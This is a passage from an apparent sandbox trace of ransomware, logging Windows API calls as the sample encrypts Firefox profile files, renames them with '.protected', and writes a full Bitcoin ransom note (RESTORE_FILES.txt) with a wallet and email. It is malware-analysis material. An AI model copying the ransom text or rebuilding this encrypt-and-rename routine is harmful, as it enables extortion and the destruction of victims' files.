(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".txt") returned 0x0 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".rar") returned 0x0 [0090.673] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.673] StrStrW (lpFirst="key3.db", lpSrch=".zip") returned 0x0 [0090.673] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.690] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.690] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.691] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.691] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 
| out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.691] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.691] CloseHandle (hObject=0x154) returned 1 [0090.691] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.protected") returned 109 [0090.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.protected")) returned 1 [0090.692] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Windows") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Program Files") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="Program Files (x86)") returned -1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="$Recycle.bin") returned 1 [0090.692] lstrcmpiW (lpString1="localstore.rdf", lpString2="System Volume Information") returned -1 [0090.692] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.692] StrStrIW 
(lpFirst="localstore.rdf", lpSrch=".protected") returned 0x0 [0090.692] lstrcmpW (lpString1="localstore.rdf", lpString2="RESTORE_FILES.txt") returned -1 [0090.692] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.692] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".txt") returned 0x0 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".rar") returned 0x0 [0090.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0090.694] StrStrW (lpFirst="localstore.rdf", lpSrch=".zip") returned 0x0 [0090.694] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x501, lpOverlapped=0x0) returned 1 [0090.728] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffaff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x501, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x501, lpOverlapped=0x0) returned 1 [0090.728] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.728] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.728] CloseHandle (hObject=0x154) returned 1 [0090.728] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.protected") returned 116 [0090.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.protected")) returned 1 [0090.729] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="Windows") returned -1 [0090.729] lstrcmpiW 
(lpString1="marionette.log", lpString2="Program Files") returned -1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="Program Files (x86)") returned -1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="$Recycle.bin") returned 1 [0090.729] lstrcmpiW (lpString1="marionette.log", lpString2="System Volume Information") returned -1 [0090.729] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.729] StrStrIW (lpFirst="marionette.log", lpSrch=".protected") returned 0x0 [0090.729] lstrcmpW (lpString1="marionette.log", lpString2="RESTORE_FILES.txt") returned -1 [0090.729] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.730] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".txt") returned 0x0 [0090.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".rar") returned 0x0 [0090.730] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0090.730] StrStrW (lpFirst="marionette.log", lpSrch=".zip") returned 0x0 [0090.730] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x39, lpOverlapped=0x0) returned 1 [0090.731] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x39, lpOverlapped=0x0) returned 1 [0090.731] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.731] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.731] CloseHandle (hObject=0x154) returned 1 [0090.731] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.protected") returned 116 [0090.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.protected")) returned 1 [0090.732] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Windows") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Program Files") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Program Files (x86)") returned -1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="$Recycle.bin") returned 1 [0090.732] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="System Volume Information") returned -1 [0090.732] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.732] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch=".protected") returned 0x0 [0090.732] lstrcmpW (lpString1="mimeTypes.rdf", lpString2="RESTORE_FILES.txt") returned -1 [0090.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".txt") returned 0x0 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".rar") returned 0x0 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".zip") returned 0x0 [0090.733] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xef3, lpOverlapped=0x0) returned 1 [0090.768] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff10d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.768] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xef3, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xef3, lpOverlapped=0x0) returned 1 [0090.769] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.769] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.769] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.769] CloseHandle (hObject=0x154) returned 1 [0090.769] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.protected") returned 115 [0090.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.protected")) returned 1 [0090.770] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Windows") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Program Files") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Program Files (x86)") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="$Recycle.bin") returned 1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="System Volume Information") returned -1 [0090.770] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 101 [0090.770] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0090.770] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0090.770] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*") returned 103 [0090.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.771] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.771] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\.") returned 103 [0090.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.771] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.771] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.771] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\..") returned 104 [0090.772] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.772] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.772] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 
0 [0090.772] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.772] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\RESTORE_FILES.txt") returned 119 [0090.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.772] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.773] lstrlenA (lpString="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") returned 684 [0090.773] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.773] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.773] CloseHandle (hObject=0x154) returned 1 [0090.774] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Windows") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Program Files") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Program Files (x86)") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="$Recycle.bin") returned 1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="System Volume Information") returned -1 [0090.774] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.774] StrStrIW (lpFirst="parent.lock", lpSrch=".protected") returned 0x0 [0090.774] lstrcmpW (lpString1="parent.lock", lpString2="RESTORE_FILES.txt") returned -1 [0090.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.774] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", 
